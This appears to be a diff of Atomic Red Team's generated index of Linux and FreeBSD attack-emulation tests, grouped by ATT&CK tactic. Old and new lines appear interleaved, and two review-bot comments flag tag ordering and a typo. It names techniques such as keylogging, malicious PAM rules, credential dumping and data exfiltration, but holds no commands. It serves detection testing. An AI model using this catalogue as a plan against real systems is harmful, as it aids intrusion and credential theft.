- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
@@ -464,8 +532,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -476,43 +545,56 @@
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]

# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
|
||||
- Atomic Test #5: SUDO Brute Force - Debian [linux]
|
||||
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
|
||||
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
|
||||
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
|
||||
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
@@ -528,19 +610,23 @@
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- Atomic Test #2: Search Through sh History [linux]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [linux, macos]
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
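Review bot: platform tags are emitted in inconsistent order within the same technique: `Atomic Test #1: Find AWS credentials [macos, linux]` sits next to `Atomic Test #3: Extract passwords with grep [linux, macos]`, and `Atomic Test #2: Discover Private SSH Keys [linux, macos]` uses yet another order than the `[macos, linux]` entries for tests #5 and #7. The generator is apparently printing supported platforms in YAML declaration order; sorting the list before rendering would keep this index diff-stable and stop unrelated reorderings from showing up as changes in future merges.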
@@ -549,95 +635,112 @@
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
- Atomic Test #3: Access /etc/passwd (Local) [linux]
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #23: Active Directory Domain Search [linux]
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
- Atomic Test #7: Enumerate users and groups [linux, macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #15: Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS [linux]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl [linux]
- Atomic Test #4: System Service Discovery - service [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [freebsd, linux, macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
- Atomic Test #8: Hostname Discovery [linux, macos]
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
- Atomic Test #25: Linux List Kernel Modules [linux]
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux]
- Atomic Test #3: Nix File and Directory Discovery [linux, macos]
- Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos]
- Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [freebsd, linux, macos]
- Atomic Test #1: Process Discovery - ps [linux, macos]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux]
- Atomic Test #1: Permission Groups Discovery (Local) [linux, macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - FreeBSD [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #5: Examine password expiration policy - All Linux [linux]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #3: Discover System Language with locale [freebsd, linux]
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos]
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - netstat [linux]
- Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan Nmap for FreeBSD [linux]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -662,38 +765,41 @@
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]

# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -709,34 +815,39 @@
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos]
- Atomic Test #2: Command-Line Interface [freebsd, linux, macos]
- Atomic Test #1: Create and Execute Bash Shell Script [linux, macos]
- Atomic Test #2: Command-Line Interface [linux, macos]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [freebsd, linux]
- Atomic Test #6: What shell is running [freebsd, linux]
- Atomic Test #7: What shells are available [freebsd, linux]
- Atomic Test #8: Command line scripts [freebsd, linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
- Atomic Test #11: Change login shell [linux]
- Atomic Test #12: Change login shell (freebsd) [linux]
- Atomic Test #13: Environment variable scripts [linux]
- Atomic Test #14: Environment variable scripts (freebsd) [linux]
- Atomic Test #15: Detecting pipe-to-shell [linux]
- Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
- Atomic Test #17: Current kernel information enumeration [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux]
- Atomic Test #2: Execute Python via scripts [freebsd, linux]
- Atomic Test #3: Execute Python via Python executables [freebsd, linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux]
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts [linux]
- Atomic Test #3: Execute Python via Python executables [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]

# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
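Review bot: the test name `Atomic Test #1: Execute shell script via python's command mode arguement [linux]` carries the misspelling "arguement" (for "argument") in both the old and the new line of this hunk. Since this index is generated output, the correction belongs in the name field of the T1059.006 atomic definition it is rendered from, followed by a regenerate; hand-editing the index would be overwritten on the next run.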
@@ -760,8 +871,11 @@
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]

# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -772,21 +886,22 @@
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #8: Python3 http.server [linux]
- Atomic Test #9: Python3 http.server (freebsd) [linux]

